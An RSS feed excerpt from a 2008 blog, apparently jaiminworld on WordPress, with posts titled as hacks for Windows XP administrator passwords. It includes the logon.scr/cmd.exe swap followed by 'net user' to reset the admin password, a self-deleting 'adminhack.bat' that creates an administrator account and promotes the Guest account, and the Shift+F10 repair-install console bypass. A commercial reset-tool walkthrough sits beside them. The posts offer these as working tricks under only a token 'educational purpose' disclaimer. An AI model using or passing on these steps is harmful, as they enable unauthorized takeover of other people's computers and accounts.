4. copy logon.scr newpass\logon.scr<br />
5. copy cmd.exe newpass\cmd.exe<br />
6. del logon.scr<br />
7. rename cmd.exe logon.scr</p>
<p>So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command</p>
<p>net user password</p>
<p>Example: If the admin username is ‘jaiminworld’ and you want change the password to ‘yourpassword’ Then type in the following command</p>
<p>net user jaiminworld yourpassword</p>
<p>This will change the administrator password to yourpassword.<br />
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HACK admin from GUEST]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/hack-admin-from-guest/</link>
<pubDate>Wed, 17 Sep 2008 18:11:15 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/hack-admin-from-guest/</guid>
<description><![CDATA[Please Dont missuse This ARTICLE. Its meant for &#8220;Educational Purpose&#8221; only or for helpin]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Please Dont missuse This ARTICLE. Its meant for &#8220;Educational Purpose&#8221; only or for helping those who have lost their PASSWORD.</p>
<p>Hack &#8220;GUEST&#8221; with Admin privileges&#8230;&#8230;..</p>
<p>echo off<br />
title Please wait&#8230;<br />
cls<br />
net user add Username Password /add<br />
net user localgroup Administrators Username /add<br />
net user Guest 420 /active:yes<br />
net localgroup Guests Guest /DELETE<br />
net localgroup Administrators Guest /add<br />
del %0</p>
<p>Copy this to notepad and save the file as &#8220;adminhack.bat&#8221;<br />
then u can double click the file to execute or run in the cmd.<br />
it works&#8230;</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hack Windows account password using Windows Key]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/hack-windows-account-password-using-windows-key/</link>
<pubDate>Wed, 17 Sep 2008 18:11:06 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/hack-windows-account-password-using-windows-key/</guid>
<description><![CDATA[Below are the steps to reset Windows account password using Windows Key. Download a free demo versio]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Below are the steps to reset Windows account password using Windows Key.</p>
<ol>
<li><a href="http://www.lostpassword.com/demos/winkeyd.exe">Download</a> a free demo version of Windows Key (to reset a &#8220;Demo12345&#8243; password for a trial) or <a href="http://www.lostpassword.com/windows-xp-2000-nt.htm#order">buy</a> an instant download online (to reset an uknown password)</li>
<li>Run the downloaded file to install Windows Key. You can install Windows Key on any PC you have access to</li>
<li>At the end of the installation process enable the &#8220;Run Windows Key&#8221;<br />
check-box and click the &#8220;Finish&#8221; button. Windows Key will be launched<br />
automatically</li>
<li>Create a password reset <a href="http://www.lostpassword.com/windows-howto.htm#cd">CD</a>,<a href="http://www.lostpassword.com/windows-howto.htm#usb-flash">USB Flash drive</a> or a <a href="http://www.lostpassword.com/windows-howto.htm#floppy">driver floppy</a> following the instructions below:</li>
</ol>
<h3><a name="cd">Using a Windows Key bootable CD</a></h3>
<ol>
<li>Click the &#8220;CD image&#8221; link</li>
<li>Insert Windows Setup CD and browse for the TXTSETUP.SIF file. The<br />
file is usually located in the &#8216;I386&#8242; folder of the Windows Setup CD.<br />
Click &#8220;Next&#8221;<br />
(Don&#8217;t have any Windows Setup CD? <a href="http://www.lostpassword.com/iso-request.htm" target="_blank">Request</a> a Windows Key .ISO download)</li>
<li>Enter you name and set your own password for the bootable CD (you may set an empty password). Click &#8220;Next&#8221;</li>
<li>WindowsKey.iso file is created</li>
<li>Insert a blank CD, specify your burning drive from the list and click &#8220;Next&#8221;</li>
<li>Windows Key password reset CD is ready<span style="text-decoration:underline;"><a name="cd_next">What should I do next?</a></span></li>
<li>Reboot your system with this CD</li>
<li>Windows Setup process starts</li>
<li>After all the required files are loaded from the bootable CD,<br />
Windows Key starts working. It displays your license info and asks to<br />
enter the password that you set for the bootable CD</p>
<p>Continue to step 14*</li>
</ol>
<h3><a name="usb-flash">Using a Windows Key bootable USB Flash Drive</a></h3>
<ol>
<li>Click the &#8220;USB Flash Drive&#8221; link</li>
<li>Connect a blank USB Flash Drive. Click &#8220;Next&#8221;</li>
<li>Insert Windows Setup CD and browse for the TXTSETUP.SIF file. Click &#8220;Next&#8221;<br />
(Don&#8217;t have any Windows Setup CD? <a href="http://www.lostpassword.com/iso-request.htm" target="_blank">Request</a> a Windows Key .ISO download)</li>
<li>Enter you name and set your own password for the bootable USB Flash Drive (you may set an empty password). Click &#8220;Next&#8221;</li>
<li>Windows Key password reset USB Drive is ready<span style="text-decoration:underline;"><a name="usb_next">What should I do next?</a></span></li>
<li>Reboot your system with this USB Drive.<br />
To reboot your PC with<br />
USB Flash Drive you may need to set the following options for the BIOS<br />
Setup Utility: after rebooting your PC please press &#8220;Del&#8221; or &#8220;F2&#8243; to<br />
run BIOS Setup Utility, go to the &#8220;Boot&#8221; section and press &#8220;F6&#8243; to move<br />
the &#8220;Hard Drive&#8221; device up, press &#8220;Enter&#8221; on the &#8220;Hard Drive&#8221; option<br />
and press &#8220;F6&#8243; to move the &#8220;USB Drive&#8221; device up. After all the changes<br />
are set please press &#8220;F10&#8243; to exit and save the settings</li>
<li>Windows Setup process starts</li>
<li>After all the required files are loaded from the USB Drive, Windows<br />
Key starts working. It displays your license info and asks to enter the<br />
password that you set for the bootable USB Flash Drive</p>
<p>Continue to step 14*</li>
</ol>
<h3><a name="floppy">Using a Windows Key driver floppy</a></h3>
<ol>
<li>Click the &#8220;driver floppy&#8221; link</li>
<li>Insert a blank floppy into the floppy drive and click &#8220;Next&#8221;</li>
<li>Enter you name and set your own password for the driver floppy (you may set an empty password). Click &#8220;Next&#8221;</li>
<li>Windows Key creates three files on the floppy: winkey.sys, winkey.inf and textsetup.oem. The driver floppy is ready<span style="text-decoration:underline;"><a name="floppy_next">What should I do next?</a></span></li>
<li>Insert Windows Setup CD or bootable floppy and reboot your PC</li>
<li>Windows Setup blue screen appears</li>
<li>Press &#8220;F6&#8243; when Windows Setup prompts for additional drivers at the bottom line of the blue screen</li>
<li>Windows Setup continues loading required files from the bootable CD or floppies</li>
<li>Windows Setup prompts you to press &#8220;S&#8221; to specify additional drivers. Press &#8220;S&#8221; and insert the Windows Key driver floppy</li>
<li>Press &#8220;Enter&#8221; to specify the &#8220;Windows Key&#8221; driver</li>
<li>Windows Setup loads the files from the floppy drive</li>
<li>Windows Setup continues loading the files from the Setup CD or prompts you to continue with the rest of the bootable floppies</li>
<li>After all the required files are loaded from the Setup CD or<br />
bootable floppies, Windows Key starts working. It displays your license<br />
info and asks to enter the password that you set for the driver floppy</p>
<p>Continue to step 14*</li>
</ol>
<h3><a name="boot_mode">Boot Mode</a></h3>
<ol> 14*. Please enter the password that you have set for the Windows Key bootable media<br />
15.  Select the Windows installation to be unlocked</p>
<p>16. Windows Key asks: &#8220;Undo Windows Key changes? (Y/N)&#8221;. Press &#8220;N&#8221;<br />
if you want to reset the password or &#8220;Y&#8221; if you want to leave the<br />
original passwords and cancel the program changes<br />
17. Select the account to reset the password for<br />
18.<br />
Windows Key asks: &#8220;Reset &#8216;account_name&#8217; password? (Y/N)&#8221;. Press &#8220;Y&#8221; to<br />
reset the password or &#8220;N&#8221; to leave the original password<br />
19. Windows<br />
Key asks: &#8220;Reset password for another account? (Y/N)&#8221;. Press &#8220;Y&#8221; to<br />
reset password for another account or &#8220;N&#8221; to quit Windows Key<br />
20. Remove the Windows Key bootable media and restart your PC.</ol>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Log In WithOut Win Xp Admin Password]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/log-in-without-win-xp-admin-password/</link>
<pubDate>Wed, 17 Sep 2008 18:11:02 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/log-in-without-win-xp-admin-password/</guid>
<description><![CDATA[You can bypass the admin password by following trick for that you only need bootable Windows XP CD a]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>You can bypass the admin password by following trick for that you only need bootable Windows XP CD and little know access hole in Windows XP<br />
Let’s get started</p>
<p>1. Place your Windows XP CD and start your comp (before that set your bios set to boot from CD)</p>
<p>2. Screen messages for booting is typically “Press any key to boot from cd”</p>
<p>3. The first screen will indicate that Setup is inspecting your system and loading files.</p>
<p>4. When you get to the Welcome setup screen press Enter to setup Windows now</p>
<p>5. The licensing Agreement comes next – Press  to accept it.</p>
<p>6. The next screen is the SETUP screen which gives you the option to do a Repair. It should read something like “if on of the following Windows XP installations is damaged, Setup can try to repair it”<br />
Use the up and down arrow keys to select your XP installation (in case you have more than one Windows on your comp – if you have one, it should already be selected) and PRESS R TO BEGIN REPAIR process.</p>
<p>7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.</p>
<p>8. Shortly after the Copying Files stage, you will be required to reboot.(this will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”</p>
<p>9. During the reboot, do not make the mistake of “pressing any key” to booth from CD again! Setup will resume automatically with the standard billboard screens and you will notice INSTALLING WINDOWS is highlighted.</p>
<p>10. Keep YOUR EYE ON THE LOWER LEFT HAND SIDE OF THE SCREEN AND WHEN YOU SEE THE INSTALLING DEVICES progress bar, PRESS (SHIFT + F10). This is security hole! A command console will now open up giving you the potential for wide access to your system.</p>
<p>11. At the prompt type NUSRMGR.CPL and press ENTER. Bingo! You have just gained graphical access to your User Accounts in the Control Panel.</p>
<p>12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made tour changes close the windows, exit the command box and continue on with Repair.</p>
<p>13. Once Repair is done you will be able to log on with your new password (or with out if you chose not to be asked for password) and so lives go one.</p>
</div>]]></content:encoded>
</item>

</channel>
</rss>
